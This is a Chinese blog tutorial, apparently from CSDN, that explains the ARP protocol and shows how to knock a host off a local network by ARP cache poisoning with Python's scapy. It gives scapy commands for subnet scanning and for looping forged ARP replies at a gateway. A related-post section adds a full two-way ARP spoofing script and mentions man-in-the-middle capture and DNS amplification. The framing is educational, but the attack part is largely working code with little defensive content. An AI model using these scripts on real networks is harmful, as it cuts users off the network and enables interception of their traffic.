ARP协议及局域网断网攻击(scapy)

最新推荐文章于 2023-11-07 13:06:51 发布
最新推荐文章于 2023-11-07 13:06:51 发布
阅读量1.6k 收藏 7
点赞数 2
分类专栏: 网络安全 文章标签: scapy ARP协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43140627/article/details/84349536
版权

ARP协议攻击
地址解析协议,即ARP(Address Resolution Protocol),是根据IP地址获取物理地址的一个TCP/IP协议。主机发送信息时将包含目标IP地址的ARP请求广播到网络上的所有主机,并接收返回消息,以此确定目标的物理地址;收到返回消息后将该IP地址和物理地址存入本机ARP缓存中并保留一定时间,下次请求时直接查询ARP缓存以节约资源。地址解析协议是建立在网络中各个主机互相信任的基础上的,网络上的主机可以自主发送ARP应答消息,其他主机收到应答报文时不会检测该报文的真实性就会将其记入本机ARP缓存;由此攻击者就可以向某一主机发送伪ARP应答报文,使其发送的信息无法到达预期的主机或到达错误的主机,这就构成了一个ARP欺骗。ARP命令可用于查询本机ARP缓存中IP地址和MAC地址的对应关系、添加或删除静态对应关系等。

ARP报文结构:
在这里插入图片描述
下图是使用wireshark抓取的ARP报文,可以看到和上面的报文结构一一对应。在这里插入图片描述在这里插入图片描述上面分别是ARP请求报文和应答报文。需要注意到的是请求报文的Opcode=1,而应答报文的Opcode=2。这点在我们伪造ARP报文是需要用到的。

ARP攻击
1.扫描局域网内主机IP地址与MAC地址的对应关系:
(1)直接构造请求报文:

pkt=Ether(dst=”ff:ff:ff:ff:ff:ff”)/ARP(pdst=”192.168.1.1/24”)  //24为子网掩码
a,b=send(pkt)
a.show()

(2)使用scapy内置的arping()函数直接扫描。

arping("192.168.1.1/24")

在这里插入图片描述

构造欺骗报文

pkt=ARP(psrc="192.168.1.100" ,pdst="192.168.1.1",op=2)
srloop(pkt)    //循环发送pkt数据包

psrc地址是我们要欺骗的地址,pdst是ARP数据包的目的地址,也就是网关地址。
通过循环发送这个数据包给网关,让网关相信“192.168.1.100”对应的MAC地址是本机的MAC地址,即把要发送给“192.168.1.100”的数据包发送给我们这台主机。而真正的“192.168.1.100” 收不到数据包,就相当于断网了。

查看本机ARP缓存表,在cmd命令行中输入arp -a 即可。
arp毒化前的:
在这里插入图片描述
arp毒化后:
在这里插入图片描述
我们可以看到“192.168.1.100”对应的mac地址发生了变化。
毒化后其mac地址变成了本机的地址,说明毒化成功。

注意: arp协议是工作在局域网内的,对外网不起作用;

吾心0218
关注
  • 2
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
黑客-ubuntu下scapyARP攻击(1)
猪也fine的博客
06-28 2307
实现目标,利用arp响应,让处于同一局域网内的主机无法上网 首先下载scapy:sudo apt-get install python-scapy然后输入sudo scapy如果出现 说明安装成功,接下来就可以开始攻击了 先重开一个终端,输入arp -a 其中网关ip是192.168.1.1 mac地址是a8:57:4e:32:02:ba; 要攻击的主机ip是192.168.1.108 m
利用 Python 开发包 Scapy 实现 ARP 欺骗_python实现ip欺骗检测
最新发布
m0_60635224的博客
04-09 977
Python编程学习,学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,不要看完;在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web 渗透、安全服务、安全分析等岗位;③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察。
scapy(一):简介及实现ARP攻击
jpygx123的博客
11-20 7726
Scapy是一个强大的交互式数据包处理程序(使用python编写)。它能够伪造或者解码大量的网络协议数据包,能够发送、捕捉、匹配请求和回复包等等。 最重要的他还有很多更优秀的特性——发送无效数据帧、注入修改的802.11数据帧、在WEP上解码加密通道(VOIP)、ARP缓存攻击(VLAN) 等,这也是其他工具无法处理完成的。 用scapy构造数据包 在 Scapy 中可以用特别简单的方法...
python通过scapy模块进行arp断网攻击
weixin_30847865的博客
01-28 736
前言: 想实现像arpsoof一样的工具 arp断网攻击原理: 通过伪造IP地址与MAC地址实现ARP欺骗,在网络发送大量ARP通信量。攻击者 只要持续不断发送arp包就能造成中间人攻击或者断网攻击。 0x01: 准备工作 Linux环境下:(windows环境下各种错误,其中有个错误是缺少windows.dll至今无法解决) 有scapy模块 如果没有进行安装 py2安装...
Python scapy实现一个简易arp攻击脚本
lihui的服务器技术博客
08-10 4955
Pip3 安装: apt-get install python3-pip scapy是python写的一个功能强大的交互式数据包处理程序,可用来发送、嗅探、解析和伪造网络数据包,常常被用到网络攻击和测试中。 scapy的安装在Linux非常便利,但在Windows下比较复杂。 以下假定读者使用的是Ubuntu Linux 和 Python 3 环境。 scapy的安装在Linux下非常...
scapy模块实现arp扫描,断网×××
weixin_33968104的博客
06-15 476
scapy主要基于二、三、四层工作,通过自己构造数据包发送。在kali Linux系统中可以直接输入scapy模块,进行构造数据包。在python中需要先导入scapy模块。下面用的python版本是2.x 1.构造ARP请求并发送 >>> arp = ARP() //这里把ARP()类实例化成arp >>> dir(arp) //查看arp的方...
Python中使用scapy模拟数据包实现arp攻击、dns放大攻击例子
12-23
scapy是python写的一个功能强大的交互式数据包处理程序,可用来发送、嗅探、解析和伪造网络数据包,常常被用到网络攻击和测试中。 这里就直接用python的scapy搞。 这里是arp攻击方式,你可以做成arp攻击。 复制...
Python利用scapy实现ARP欺骗的方法
01-20
使用scapyscapy.all模块的ARP、sendp、Ether等函数完成包的封装与发送。一个简单的ARP响应报文发送: eth = Ether(src=src_mac, dst=dst_mac)#赋值src_mac时需要注意,参数为字符串类型 arp = ARP(hwsrc=src_mac,...
python网络编程——实现ARP协议
12-23
2.使用scapy库中的srp()函数发送二层数据包并获得返回值 3.使用type()函数分析返回值类型,查询对应的类中的方法,来提取关键信息 发送包的属性可以在scapy中查询,如: 查询本机对应网卡,IP,MAC 代码: import ...
Python Scapy随心所欲研究TCP协议
01-20
为了能够重现Windows的tcp协议栈的一些网络行为,这里使用python的scapy进行包构造撩撩Windows的tcp协议栈。scapy在tcp数据报文注入会有一点的时延,这个工具在要求时延严格的场景无法使用(还是packetdril
Scapy_库_ARP_Scanner
07-27
ScapyARP Scanner 是一个使用 Python 库 Scapy 实现的 ARP.Scanner脚本,用于扫描局域网中的主机。下面是 ScapyARP Scanner 的知识点总结: 一、Scapy 库介绍 Scapy 库是一个功能强大的网络探测和安全测试...
scapy网络安全编程
08-10
学习scapy在网络攻防中的应用ppt。可以学习python在网络信息获取,网络协议分组构造和解析和嗅探,以及各种攻击的数据包产生。
A类网段arping存活主机脚本
10-05
A类网段arping存活主机脚本,可以扫描所有A类地址段存活主机
scapy实现arp 毒化攻击
ivnetware的博客
04-30 2666
攻击者IP    :192.168.0.112        MAC:00:0c:29:ab:27:ff 被攻击者IP:192.168.0.104        MAC:00:23:14:ad:36:c0 网关IP        :192.168.0.1             MAC:9c:21:6a:4f:cc:38  脚本a.py 欺骗 192.168.0.104主机告诉其网
黑客-ubuntu下的scapyARP攻击(2)
猪也fine的博客
07-03 4267
前一篇文章介绍了如何攻击局域网内主机,让它无法上网http://blog.csdn.net/qq_35315699/article/details/73863632 具体语言是python,有c/c++语言基础的很快就能掌握接下来我们来实现让被攻击主机依旧能上网,但数据包要从攻击者主机转发到路由器,这样我们就能获得被攻击者的所有数据包了A机为被攻击主机 i
Scapy交互式arp扫描与攻击
qq_37719766的博客
03-17 457
1、局域网Arp扫描:1)  简单实现:(复杂实现定义为方法别人可以自动实现获取自己IP地址所在段或者直接定义循环IP地址)>>>arp2=srp(Ether(dst='FF:FF:FF:FF:FF:FF')/ARP(op=1,hwdst='00:00:00:00:00:00',pdst='192.168.80.0/24'))Beginemission:***Finishedto...
Python基于scapy完成ARP欺骗
qq_53830529的博客
05-18 565
使用python的scapy库模拟ARP欺骗,实现让被攻击主机的流量也能让攻击主机抓取
Kali linux 学习笔记(十)主动信息收集——二层发现(arping、nmap、netdiscover、scapy) 2020.2.20
闵行小鱼塘
02-20 880
主动信息收集中的二层发现 主要有arping、nmap、netdiscover、scapy
21.6 Python 构建ARP中间人数据包
热门推荐
CSDN
11-07 1万+
ARP中间人攻击ARP spoofing)是一种利用本地网络的`ARP`协议漏洞进行欺骗的攻击方式,攻击者会向目标主机发送虚假`ARP`响应包,使得目标主机的`ARP`缓存中的`IP`地址和`MAC`地址映射关系被篡改,从而使得目标主机将网络流量发送到攻击者指定的虚假`MAC`地址。攻击者可以在不被发现的情况下窃取目标主机的网络流量、信息等,也可以进行其他的恶意行为,如中间人攻击、监听等。
scapy ARP攻击
08-14
Scapy是一个强大的Python库,用于网络数据包的创建、发送和捕获。要进行ARP攻击,你可以使用Scapy来构建和发送ARP欺骗数据包。 下面是一个使用Scapy进行ARP欺骗攻击的示例代码: ```python from scapy.all import * def arp_spoof(target_ip, spoof_ip): target_mac = get_mac(target_ip) packet = ARP(op=2, pdst=target_ip, hwdst=target_mac, psrc=spoof_ip) send(packet, verbose=0) def get_mac(ip): arp_request = ARP(op=1, pdst=ip) broadcast = Ether(dst="ff:ff:ff:ff:ff:ff") packet = broadcast/arp_request result = srp(packet, timeout=3, verbose=0)[0] return result[0][1].hwsrc target_ip = "192.168.1.100" # 目标IP地址 spoof_ip = "192.168.1.1" # 欺骗IP地址 try: while True: arp_spoof(target_ip, spoof_ip) arp_spoof(spoof_ip, target_ip) except KeyboardInterrupt: print("ARP攻击已停止") ``` 请注意,进行ARP攻击可能违反法律规定,除非在合法的授权和测试环境下使用。确保在进行任何网络测试之前,获得适当的授权和许可。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值